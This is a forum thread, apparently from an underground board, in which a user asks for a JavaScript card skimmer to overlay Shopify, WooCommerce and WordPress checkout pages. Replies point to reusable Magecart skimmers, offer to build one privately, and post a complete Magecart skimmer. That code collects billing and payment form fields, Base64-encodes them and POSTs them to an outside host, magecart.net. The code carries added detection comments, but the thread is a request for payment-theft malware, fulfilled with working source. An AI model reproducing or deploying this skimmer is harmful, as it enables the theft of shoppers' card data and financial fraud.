
need someone to make .js skimmer

crypt0

Пожалуйста, обратите внимание, что пользователь заблокирован
As post says i need someone to make me a .js skimmer that exils data via POST to a sperate URL and then into .CSV
Will be placed on my own shop(s) must overlay the original payment page
shops are SHOPIFY, WOOcommerce, and wordpress with payment plugins
If anyone can do lets talk
 
As post says i need someone to make me a .js skimmer that exils data via POST to a sperate URL and then into .CSV
Will be placed on my own shop(s) must overlay the original payment page
shops are SHOPIFY, WOOcommerce, and wordpress with payment plugins
If anyone can do lets talk
take a look at a recent magecart skimmer for example. you can typically use magecart skimmers pretty much out of the box without requiring many modifications to fit your needs. there are plenty of papers about it that have archived the entire javascript for analysis and can handle scraping data off all 3 of the major e-commerce platforms.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
take a look at a recent magecart skimmer for example. you can typically use magecart skimmers pretty much out of the box without requiring many modifications to fit your needs. there are plenty of papers about it that have archived the entire javascript for analysis and can handle scraping data off all 3 of the major e-commerce platforms.
thnaks for the reply can you point me to the full source a github repo for example if possible ??
 
Пожалуйста, обратите внимание, что пользователь заблокирован
As post says i need someone to make me a .js skimmer that exils data via POST to a sperate URL and then into .CSV
Will be placed on my own shop(s) must overlay the original payment page
shops are SHOPIFY, WOOcommerce, and wordpress with payment plugins
If anyone can do lets talk
if I understand correctly you want a JS skimmer in the form of plugins compatible with WordPress and woocommerce right? if so, DM
 
This skimmer was used by an Indonesian Magecart group. Source: https://thehackernews.com/2020/01/indonesian-magecart-hackers.html

JavaScript:
// NOTE(review): everything from here through the `let opener` line looks like the
// replay shim that a web-archive rewriter (Wayback Machine "wombat") wraps around
// captured scripts — confirm against the archived capture. It only re-binds the
// browser globals through a lookup helper and is not part of the skimmer logic below;
// its presence suggests the sample was copied from an archived page, so strip it
// before hashing or signature-matching the sample.
var _____WB$wombat$assign$function_____ = function(name) {return (self._wb_wombat && self._wb_wombat.local_init && self._wb_wombat.local_init(name)) || self[name]; };
if (!self.__WB_pmw) { self.__WB_pmw = function(obj) { this.__WB_source = obj; return this; } }
// The block opened here stays open across all following definitions and is closed
// by the lone `}` after the click handler.
{
  // Each global is shadowed by a block-scoped binding resolved through the helper above.
  let window = _____WB$wombat$assign$function_____("window");
  let self = _____WB$wombat$assign$function_____("self");
  let document = _____WB$wombat$assign$function_____("document");
  let location = _____WB$wombat$assign$function_____("location");
  let top = _____WB$wombat$assign$function_____("top");
  let parent = _____WB$wombat$assign$function_____("parent");
  let frames = _____WB$wombat$assign$function_____("frames");
  let opener = _____WB$wombat$assign$function_____("opener");

/**
 * Base64-encodes a string that may contain characters outside the byte range.
 *
 * encodeURIComponent() produces UTF-8 percent escapes; each %XX escape is folded
 * back into one character so that btoa() only ever sees byte-range characters.
 *
 * Analyst note: this is encoding, not encryption. A payload captured in proxy or
 * web-server logs can be recovered with a plain Base64 decode followed by UTF-8
 * decoding.
 *
 * @param {string} str - Text to encode.
 * @returns {string} Base64 text of the UTF-8 bytes of `str`.
 */
function b64EncodeUnicode(str) {
        return btoa(encodeURIComponent(str).replace(/%([0-9A-F]{2})/g,
                function toSolidBytes(match, p1) {
                    // '0x' + p1 is a hex string; fromCharCode coerces it to a number.
                    return String.fromCharCode('0x' + p1);
                }
            )
        );
    }

    /**
     * Sends `data` to `url` as an asynchronous form-encoded POST with the single
     * field `log`.
     *
     * Detection notes: from a checkout page this shows up as an XMLHttpRequest POST
     * whose body starts with `log=` followed by Base64 text, sent with
     * Content-type application/x-www-form-urlencoded. A Content-Security-Policy
     * `connect-src` allow-list that does not include the destination origin would
     * stop the browser from issuing the request.
     *
     * @param {string} url - Destination of the POST.
     * @param {string} data - Value appended after "log=" in the request body.
     */
    function sendPost(url,data){
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function() {
            // The response is never read; completion is only logged to the console.
            // The literal string below is a usable hunting artifact in script content.
            if (this.readyState == 4 && this.status == 200) {
                console.log("Success gan !");
            }
        };
        xhttp.open("POST", url, true);
        xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhttp.send("log=" + data);
    }

    /**
     * Collects every control of the form with id "co-billing-form" as
     * "name :value" strings.
     *
     * A control is included when it has either a name or a value, so hidden and
     * unlabeled fields are captured along with the visible ones.
     *
     * NOTE(review): the form id presumably corresponds to a Magento one-page
     * checkout billing step — confirm against the affected storefront template.
     *
     * @returns {string[]} One "name :value" entry per captured control.
     */
    function getBilling(){
        var data = [];
        var form = document.getElementById("co-billing-form");
        for(i=0;i<form.elements.length;i++){
            if(form.elements[i].name || form.elements[i].value){
                data.push(form.elements[i].name + " :" + form.elements[i].value);
            }
        }
        return data;  
    }

    /**
     * Collects every control of the form with id "co-payment-form" as
     * "name :value" strings, using the same inclusion rule as getBilling().
     *
     * Impact note: nothing is filtered, so whatever the payment form holds at click
     * time is taken as-is. For incident scoping, treat every field rendered in that
     * form as exposed.
     *
     * @returns {string[]} One "name :value" entry per captured control.
     */
    function getPayment(){
        var data = [];
        var form = document.getElementById("co-payment-form");
        for(i=0;i<form.elements.length;i++){
            if(form.elements[i].name || form.elements[i].value){
                data.push(form.elements[i].name + " :" + form.elements[i].value);
            }
        }
        return data;
    }

    /**
     * Builds the outgoing payload: billing entries and payment entries, each group
     * joined with " | ", concatenated and Base64-encoded.
     *
     * Forensic note: after decoding a captured payload, records are
     * " | "-separated "name :value" pairs. There is no separator between the two
     * groups, so the last billing entry and the first payment entry run together.
     *
     * @returns {string} Base64 text of the combined form data.
     */
    function buildData(){
        var data = b64EncodeUnicode(getBilling().join(" | ") + getPayment().join(" | "));  
        return data;
    }

    // Page-wide click hook that triggers the capture. Assigning document.onclick
    // replaces whatever handler the page had set on that property.
    //
    // Defender notes:
    //  - The destination is hard-coded below; the host and path are the network
    //    indicator for this sample.
    //  - The script depends on fixed element ids and a fixed class name, which makes
    //    the strings "co-billing-form", "co-payment-form", "order-review-button" and
    //    "paypal_direct_cc_cid" useful content signatures when scanning storefront
    //    JavaScript for unauthorised changes.
    //  - Integrity monitoring of checkout scripts and a restrictive CSP are the
    //    controls that apply to this pattern.
    document.onclick= function(event) {
        // Fallbacks for legacy browsers that expose the event globally / via srcElement.
        if (event===undefined) event= window.event;
        var target= 'target' in event? event.target : event.srcElement;
        // Fires for the element whose className is exactly "order-review-button",
        // and also for a click on any <span> on the page.
        if(target.className == "order-review-button" || target.tagName == "SPAN"){
            // NOTE(review): presumably the card verification field of a PayPal direct
            // payment module — confirm. Data is sent only when it is non-empty.
            var payment = document.getElementById("paypal_direct_cc_cid");
            if(payment && payment.value !== ""){
                sendPost("https://magecart.net/data.php",buildData());
            }
        }
    };

}
 

